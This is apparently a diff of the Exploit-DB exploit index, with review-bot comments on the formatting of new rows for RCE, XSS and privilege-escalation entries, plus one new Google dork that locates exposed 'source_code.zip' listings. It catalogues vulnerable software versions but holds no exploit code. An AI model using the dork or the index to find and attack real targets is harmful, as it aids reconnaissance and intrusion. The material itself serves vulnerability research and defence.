31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57650,,,,,https://www.securityfocus.com/bid/28219/info 31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57650,,,,,https://www.securityfocus.com/bid/28219/info
31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57648,,,,,https://www.securityfocus.com/bid/28219/info 31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57648,,,,,https://www.securityfocus.com/bid/28219/info
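Review bot: row 51383 writes the access condition as "Pre-Auth" while the FUXA row 51385 added in the same commit uses "Unauthenticated" for the same condition, and the version carries a "v" prefix ("v1.1.2") where most rows in this diff use a bare number ("GDidees CMS 3.9.1", "Piwigo 13.6.0"); the file already mixes both styles (compare "Projeqtor v9.3.1" with "ProjeQtOr Project Management 9.1.4"), so new rows should settle on one. The row has no CVE and no source URL; add the advisory link if one exists.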
@ -18855,6 +18862,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
1595,exploits/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,webapps,php,,2006-03-19,,1,OSVDB-24018;CVE-2006-1348;OSVDB-24017;CVE-2006-1347;OSVDB-24016;CVE-2006-1346,,,,, 1595,exploits/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,webapps,php,,2006-03-19,,1,OSVDB-24018;CVE-2006-1348;OSVDB-24017;CVE-2006-1347;OSVDB-24016;CVE-2006-1346,,,,,
3988,exploits/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,webapps,php,,2007-05-24,,1,OSVDB-36317;CVE-2007-2971,,,,, 3988,exploits/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,webapps,php,,2007-05-24,,1,OSVDB-36317;CVE-2007-2971,,,,,
11316,exploits/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion",2010-02-02,R3VAN_BASTARD,webapps,php,,2010-02-01,,1,,,,,, 11316,exploits/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion",2010-02-02,R3VAN_BASTARD,webapps,php,,2010-02-01,,1,,,,,,
51381,exploits/php/webapps/51381.txt,"GDidees CMS 3.9.1 - Local File Disclosure",2023-04-20,"Hadi Mene",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-27179,,,,,
31961,exploits/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,webapps,php,80,2014-02-27,2014-02-27,0,OSVDB-104011;OSVDB-104010;OSVDB-104009;OSVDB-104008;OSVDB-104007;CVE-2014-100031;CVE-2014-100030;CVE-2014-100029,,,,http://www.exploit-db.comgdl42.zip, 31961,exploits/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,webapps,php,80,2014-02-27,2014-02-27,0,OSVDB-104011;OSVDB-104010;OSVDB-104009;OSVDB-104008;OSVDB-104007;CVE-2014-100031;CVE-2014-100030;CVE-2014-100029,,,,http://www.exploit-db.comgdl42.zip,
8228,exploits/php/webapps/8228.txt,"GDL 4.x - 'node' SQL Injection",2009-03-17,g4t3w4y,webapps,php,,2009-03-16,,1,OSVDB-52803;CVE-2009-0965,,,,, 8228,exploits/php/webapps/8228.txt,"GDL 4.x - 'node' SQL Injection",2009-03-17,g4t3w4y,webapps,php,,2009-03-16,,1,OSVDB-52803;CVE-2009-0965,,,,,
3522,exploits/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,webapps,php,,2007-03-19,2016-09-27,1,OSVDB-33776;CVE-2007-1577,,,,http://www.exploit-db.comgeblog-0.1.tar.gz, 3522,exploits/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,webapps,php,,2007-03-19,2016-09-27,1,OSVDB-33776;CVE-2007-1577,,,,http://www.exploit-db.comgeblog-0.1.tar.gz,
@ -22297,6 +22305,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3275,exploits/php/webapps/3275.txt,"LightRO CMS 1.0 - 'inhalt.php' Remote File Inclusion",2007-02-06,ajann,webapps,php,,2007-02-05,,1,OSVDB-34599;CVE-2007-0824,,,,, 3275,exploits/php/webapps/3275.txt,"LightRO CMS 1.0 - 'inhalt.php' Remote File Inclusion",2007-02-06,ajann,webapps,php,,2007-02-05,,1,OSVDB-34599;CVE-2007-0824,,,,,
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,,2021-06-25,2021-06-25,1,,,,,http://www.exploit-db.comblog-1.3.zip, 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,,2021-06-25,2021-06-25,1,,,,,http://www.exploit-db.comblog-1.3.zip,
5873,exploits/php/webapps/5873.txt,"Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities",2008-06-20,storm,webapps,php,,2008-06-19,2016-12-08,1,OSVDB-57817;CVE-2008-7172;OSVDB-57816;CVE-2008-7171;OSVDB-57815;OSVDB-57814,,,,, 5873,exploits/php/webapps/5873.txt,"Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities",2008-06-20,storm,webapps,php,,2008-06-19,2016-12-08,1,OSVDB-57817;CVE-2008-7172;OSVDB-57816;CVE-2008-7171;OSVDB-57815;OSVDB-57814,,,,,
51374,exploits/php/webapps/51374.py,"Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)",2023-04-20,"max / Zoltan Padanyi",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
14443,exploits/php/webapps/14443.txt,"LILDBI - Arbitrary File Upload",2010-07-23,EraGoN,webapps,php,,2010-07-23,2010-07-23,0,,,,,, 14443,exploits/php/webapps/14443.txt,"LILDBI - Arbitrary File Upload",2010-07-23,EraGoN,webapps,php,,2010-07-23,2010-07-23,0,,,,,,
1373,exploits/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,webapps,php,,2005-12-13,2017-11-22,1,OSVDB-21753;CVE-2005-4318,,,,, 1373,exploits/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,webapps,php,,2005-12-13,2017-11-22,1,OSVDB-21753;CVE-2005-4318,,,,,
6796,exploits/php/webapps/6796.txt,"Limbo CMS - Private Messaging Component SQL Injection",2008-10-21,StAkeR,webapps,php,,2008-10-20,,1,OSVDB-51863;CVE-2008-6078,,,,, 6796,exploits/php/webapps/6796.txt,"Limbo CMS - Private Messaging Component SQL Injection",2008-10-21,StAkeR,webapps,php,,2008-10-20,,1,OSVDB-51863;CVE-2008-6078,,,,,
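Review bot: row 51374 (Lilac-Reloaded for Nagios 2.0.8 RCE) omits the authentication qualifier that the adjacent row 50064 and the Serendipity row 51372 in this commit carry as "(Authenticated)"; if the Lilac exploit needs a login the description should say so, and if it does not, "Unauthenticated" as on row 51385 makes that explicit. The author column "max / Zoltan Padanyi" packs two names into one field with a slash; check that this matches the file's co-author convention before tooling that splits on "/" sees it.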
@ -27481,6 +27490,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37146,exploits/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",webapps,php,,2012-05-09,2015-05-29,1,CVE-2012-2274;OSVDB-81747,,,,,https://www.securityfocus.com/bid/53434/info 37146,exploits/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",webapps,php,,2012-05-09,2015-05-29,1,CVE-2012-2274;OSVDB-81747,,,,,https://www.securityfocus.com/bid/53434/info
38881,exploits/php/webapps/38881.html,"Piwigo - 'admin.php' Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,webapps,php,,2013-12-17,2015-12-06,1,OSVDB-101409,,,,,https://www.securityfocus.com/bid/64357/info 38881,exploits/php/webapps/38881.html,"Piwigo - 'admin.php' Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,webapps,php,,2013-12-17,2015-12-06,1,OSVDB-101409,,,,,https://www.securityfocus.com/bid/64357/info
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,,2021-05-03,2021-05-03,0,CVE-2021-27973,,,,http://www.exploit-db.comPiwigo-11.3.0.zip, 49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,,2021-05-03,2021-05-03,0,CVE-2021-27973,,,,http://www.exploit-db.comPiwigo-11.3.0.zip,
51386,exploits/php/webapps/51386.txt,"Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
34367,exploits/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",webapps,php,,2009-10-28,2014-08-19,1,CVE-2009-4039;OSVDB-59955,,,,,https://www.securityfocus.com/bid/41897/info 34367,exploits/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",webapps,php,,2009-10-28,2014-08-19,1,CVE-2009-4039;OSVDB-59955,,,,,https://www.securityfocus.com/bid/41897/info
10417,exploits/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,webapps,php,,2009-12-12,,1,OSVDB-60977,,,,http://www.exploit-db.compiwigo-2.0.6.zip, 10417,exploits/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,webapps,php,,2009-12-12,,1,OSVDB-60977,,,,http://www.exploit-db.compiwigo-2.0.6.zip,
48814,exploits/php/webapps/48814.txt,"Piwigo 2.10.1 - Cross Site Scripting",2020-09-16,Iridium,webapps,php,,2020-09-16,2020-09-16,0,CVE-2020-9467,,,,, 48814,exploits/php/webapps/48814.txt,"Piwigo 2.10.1 - Cross Site Scripting",2020-09-16,Iridium,webapps,php,,2020-09-16,2020-09-16,0,CVE-2020-9467,,,,,
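Review bot: row 51386 ("Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)") names neither the injection point nor a CVE, whereas the neighbouring Piwigo rows identify the affected script or parameter ('comments.php', 'language') and carry CVEs; at minimum the description should name the field that stores the payload so the row is distinguishable from the earlier Piwigo XSS rows 34367 and 48814.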
@ -28028,6 +28038,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41433,exploits/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,webapps,php,,2017-02-22,2017-02-22,0,,,,,http://www.exploit-db.comProjectSend-r754.zip,https://www.vulnerability-lab.com/get_content.php?id=2031 41433,exploits/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,webapps,php,,2017-02-22,2017-02-22,0,,,,,http://www.exploit-db.comProjectSend-r754.zip,https://www.vulnerability-lab.com/get_content.php?id=2031
15773,exploits/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injections",2010-12-18,"DeadLy DeMon",webapps,php,,2010-12-18,2010-12-18,1,OSVDB-75934;CVE-2010-4845;OSVDB-69953,,,,, 15773,exploits/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injections",2010-12-18,"DeadLy DeMon",webapps,php,,2010-12-18,2010-12-18,1,OSVDB-75934;CVE-2010-4845;OSVDB-69953,,,,,
49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",2021-06-01,"Temel Demir",webapps,php,,2021-06-01,2021-06-01,0,,,,,, 49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",2021-06-01,"Temel Demir",webapps,php,,2021-06-01,2021-06-01,0,,,,,,
51387,exploits/php/webapps/51387.txt,"ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
45680,exploits/php/webapps/45680.txt,"ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution",2018-10-25,AkkuS,webapps,php,,2018-10-25,2018-11-06,0,CVE-2018-18924,,,,http://www.exploit-db.comprojeqtorV7.2.5.zip, 45680,exploits/php/webapps/45680.txt,"ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution",2018-10-25,AkkuS,webapps,php,,2018-10-25,2018-11-06,0,CVE-2018-18924,,,,http://www.exploit-db.comprojeqtorV7.2.5.zip,
50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",2022-01-05,"Oscar Gil Gutierrez",webapps,php,,2022-01-05,2022-01-05,0,,,,,, 50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",2022-01-05,"Oscar Gil Gutierrez",webapps,php,,2022-01-05,2022-01-05,0,,,,,,
11587,exploits/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusions",2010-02-27,cr4wl3r,webapps,php,,2010-02-26,,1,OSVDB-65128;CVE-2010-2138;OSVDB-65127;OSVDB-65126;OSVDB-65125;OSVDB-65124;OSVDB-65123;OSVDB-65122;OSVDB-65121;CVE-2010-2137,,,,http://www.exploit-db.comProMan_v.0.1.1.zip, 11587,exploits/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusions",2010-02-27,cr4wl3r,webapps,php,,2010-02-26,,1,OSVDB-65128;CVE-2010-2138;OSVDB-65127;OSVDB-65126;OSVDB-65125;OSVDB-65124;OSVDB-65123;OSVDB-65122;OSVDB-65121;CVE-2010-2137,,,,http://www.exploit-db.comProMan_v.0.1.1.zip,
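Review bot: row 51387 introduces a fourth spelling of one product: "ProjeQtOr Project Management System 10.3.2" now sits beside "ProjeQtOr Project Management 9.1.4" (49919), "ProjeQtOr Project Management Tool 7.2.5" (45680) and "Projeqtor v9.3.1" (50641), and the alphabetical sort already splits them apart; use the project's own name "ProjeQtOr" and drop the variable suffix. As with the other RCE rows added in this commit, the description should state whether the 10.3.2 RCE requires credentials.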
@ -29045,6 +29056,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46190,exploits/php/webapps/46190.txt,"SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion",2019-01-18,"Ihsan Sencan",webapps,php,80,2019-01-18,2019-01-18,0,,"File Inclusion (LFI/RFI)",,,http://www.exploit-db.comseotoasterv3.0.0.zip, 46190,exploits/php/webapps/46190.txt,"SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion",2019-01-18,"Ihsan Sencan",webapps,php,80,2019-01-18,2019-01-18,0,,"File Inclusion (LFI/RFI)",,,http://www.exploit-db.comseotoasterv3.0.0.zip,
5960,exploits/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,webapps,php,,2008-06-26,2016-12-09,1,OSVDB-46567;CVE-2008-5191;OSVDB-46566,,,,, 5960,exploits/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,webapps,php,,2008-06-26,2016-12-09,1,OSVDB-46567;CVE-2008-5191;OSVDB-46566,,,,,
18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php,,2011-12-09,2016-12-14,0,OSVDB-77591,,,,http://www.exploit-db.comseportal2.5.zip, 18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php,,2011-12-09,2016-12-14,0,OSVDB-77591,,,,http://www.exploit-db.comseportal2.5.zip,
51373,exploits/php/webapps/51373.txt,"Serendipity 2.4.0 - Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
51372,exploits/php/webapps/51372.txt,"Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,, 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,,
45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip, 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip,
10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,, 10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,,
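Review bot: row 51373 labels the Serendipity 2.4.0 finding only "Cross-Site Scripting (XSS)", with no stored/reflected qualifier and no parameter, while the Piwigo row 51386 added in the same commit says "Stored"; say where the payload lands. Both Serendipity rows (51373 and 51372) leave the CVE and reference columns empty, so add the advisory URL for each.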
@ -34708,6 +34721,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,remote,tru64,,2007-06-03,,1,OSVDB-36204;CVE-2007-2791,,,,, 4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,remote,tru64,,2007-06-03,,1,OSVDB-36204;CVE-2007-2791,,,,,
50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,,2021-06-15,2021-06-15,0,,,,,, 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,,2021-06-15,2021-06-15,0,,,,,,
51354,exploits/typescript/webapps/51354.txt,"ever gauzy v0.281.9 - JWT weak HMAC secret",2023-04-10,nu11secur1ty,webapps,typescript,,2023-04-10,2023-04-10,0,,,,,, 51354,exploits/typescript/webapps/51354.txt,"ever gauzy v0.281.9 - JWT weak HMAC secret",2023-04-10,nu11secur1ty,webapps,typescript,,2023-04-10,2023-04-10,0,,,,,,
51385,exploits/typescript/webapps/51385.txt,"FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)",2023-04-20,"Rodolfo Mariano",webapps,typescript,,2023-04-20,2023-04-20,0,,,,,,
51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-03-27,0,CVE-2019-13068,,,,, 51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-03-27,0,CVE-2019-13068,,,,,
19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix,,2000-03-16,2012-07-14,1,OSVDB-83869,,,,,https://www.securityfocus.com/bid/1071/info 19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix,,2000-03-16,2012-07-14,1,OSVDB-83869,,,,,https://www.securityfocus.com/bid/1071/info
698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer Brånemyr",local,ultrix,,2004-12-19,,1,OSVDB-12626;CVE-2004-1326,,,,, 698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer Brånemyr",local,ultrix,,2004-12-19,,1,OSVDB-12626;CVE-2004-1326,,,,,
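Review bot: row 51385 formats the version as "V.1.1.13-1186" (capital V with a dot), which matches neither the "v0.281.9" form on row 51354 directly above nor the bare-number form used elsewhere, and the "-1186" suffix looks like a build number; write it the way the project versions itself and label the build as such, otherwise version-range queries against this CSV will miss it. The unauthenticated RCE carries no CVE or reference URL; add the advisory link.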
@ -39153,6 +39167,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41031,exploits/windows/local/41031.txt,"aSc Timetables 2017 - Local Buffer Overflow",2017-01-12,"Peter Baris",local,windows,,2017-01-12,2017-01-12,0,,,,,http://www.exploit-db.comaScTimeTables.exe, 41031,exploits/windows/local/41031.txt,"aSc Timetables 2017 - Local Buffer Overflow",2017-01-12,"Peter Baris",local,windows,,2017-01-12,2017-01-12,0,,,,,http://www.exploit-db.comaScTimeTables.exe,
49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,,2020-12-02,2020-12-02,0,,,,,, 49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,,2020-12-02,2020-12-02,0,,,,,,
40520,exploits/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows,,2016-10-13,2016-10-13,0,,,,,, 40520,exploits/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows,,2016-10-13,2016-10-13,0,,,,,,
51380,exploits/windows/local/51380.txt,"AspEmail v5.6.0.2 - Local Privilege Escalation",2023-04-20,Zer0FauLT,local,windows,,2023-04-20,2023-04-20,0,,,,,,
31460,exploits/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation",2014-02-06,LiquidWorm,local,windows,,2014-02-06,2014-02-06,0,OSVDB-103048,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5168.php 31460,exploits/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation",2014-02-06,LiquidWorm,local,windows,,2014-02-06,2014-02-06,0,OSVDB-103048,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5168.php
16675,exploits/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,local,windows,,2010-09-20,2011-03-10,1,CVE-2006-6665;OSVDB-32356,"Metasploit Framework (MSF)",,,, 16675,exploits/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,local,windows,,2010-09-20,2011-03-10,1,CVE-2006-6665;OSVDB-32356,"Metasploit Framework (MSF)",,,,
2950,exploits/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,local,windows,,2006-12-18,2016-10-27,1,OSVDB-32356;CVE-2006-6665,,,,, 2950,exploits/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,local,windows,,2006-12-18,2016-10-27,1,OSVDB-32356;CVE-2006-6665,,,,,
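Review bot: row 51380 describes the AspEmail v5.6.0.2 issue only as "Local Privilege Escalation" with no mechanism, whereas the neighbouring row 40520 spells out "Unquoted Service Path Privilege Escalation"; name the root cause the .txt documents (service path, file permissions, or whatever it is) in the description, since "Local Privilege Escalation" alone does not distinguish this row from the others under windows/local. No CVE or reference is set either.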
@ -39710,6 +39725,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16640,exploits/windows/local/16640.rb,"feedDemon 3.1.0.12 - Local Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows,,2010-11-11,2011-03-10,1,CVE-2009-0546;OSVDB-51753,"Metasploit Framework (MSF)",,,, 16640,exploits/windows/local/16640.rb,"feedDemon 3.1.0.12 - Local Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows,,2010-11-11,2011-03-10,1,CVE-2009-0546;OSVDB-51753,"Metasploit Framework (MSF)",,,,
11379,exploits/windows/local/11379.c,"feedDemon 3.1.0.9 - '.opml' File Buffer Overflow",2010-02-09,"fl0 fl0w",local,windows,,2010-02-08,,1,OSVDB-51753;CVE-2009-0546,,,,http://www.exploit-db.comFeedDemonInstall.exe, 11379,exploits/windows/local/11379.c,"feedDemon 3.1.0.9 - '.opml' File Buffer Overflow",2010-02-09,"fl0 fl0w",local,windows,,2010-02-08,,1,OSVDB-51753;CVE-2009-0546,,,,http://www.exploit-db.comFeedDemonInstall.exe,
14046,exploits/windows/local/14046.py,"FieldNotes 32 5.0 - Local Buffer Overflow (SEH)",2010-06-25,TecR0c,local,windows,,2010-06-25,2010-11-12,1,,,,,,http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053 14046,exploits/windows/local/14046.py,"FieldNotes 32 5.0 - Local Buffer Overflow (SEH)",2010-06-25,TecR0c,local,windows,,2010-06-25,2010-11-12,1,,,,,,http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053
51375,exploits/windows/local/51375.txt,"File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control",2023-04-20,"Andrea Intilangelo",local,windows,,2023-04-20,2023-04-20,0,CVE-2023-26918,,,,,
50763,exploits/windows/local/50763.txt,"File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path",2022-02-18,SamAlucard,local,windows,,2022-02-18,2022-02-18,0,,,,,, 50763,exploits/windows/local/50763.txt,"File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path",2022-02-18,SamAlucard,local,windows,,2022-02-18,2022-02-18,0,,,,,,
21892,exploits/windows/local/21892.txt,"FileBound 6.2 - Local Privilege Escalation",2012-10-11,"Nathaniel Carew",local,windows,,2012-10-11,2012-10-11,0,OSVDB-86254,,,,,http://www.senseofsecurity.com.au/advisories/SOS-12-010.pdf 21892,exploits/windows/local/21892.txt,"FileBound 6.2 - Local Privilege Escalation",2012-10-11,"Nathaniel Carew",local,windows,,2012-10-11,2012-10-11,0,OSVDB-86254,,,,,http://www.senseofsecurity.com.au/advisories/SOS-12-010.pdf
35077,exploits/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",local,windows,,2014-10-28,2014-10-28,0,CVE-2014-8347;OSVDB-113845,,,,, 35077,exploits/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",local,windows,,2014-10-28,2014-10-28,0,CVE-2014-8347;OSVDB-113845,,,,,
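Review bot: the description in the 51375 row reads "Password reset due Incorrect Access Control", which is missing the word "to"; suggest "File Replication Pro 7.5.0 - Privilege Escalation/Password reset due to Incorrect Access Control" so the title reads correctly in the listing.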

ghdb.xml

@ -37610,6 +37610,21 @@ stag_1</textualDescription>
<date>2021-07-21</date> <date>2021-07-21</date>
<author>Osman Arif</author> <author>Osman Arif</author>
</entry> </entry>
<entry>
<id>8162</id>
<link>https://www.exploit-db.com/ghdb/8162</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Index of&quot; intext:&quot;source_code.zip</shortDescription>
<textualDescription># Google Dork: Index of&quot; intext:&quot;source_code.zip
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: PARAG BAGUL</textualDescription>
<query>Index of&quot; intext:&quot;source_code.zip</query>
<querystring>https://www.google.com/search?q=Index of&quot; intext:&quot;source_code.zip</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>PARAG BAGUL</author>
</entry>
<entry> <entry>
<id>7638</id> <id>7638</id>
<link>https://www.exploit-db.com/ghdb/7638</link> <link>https://www.exploit-db.com/ghdb/7638</link>
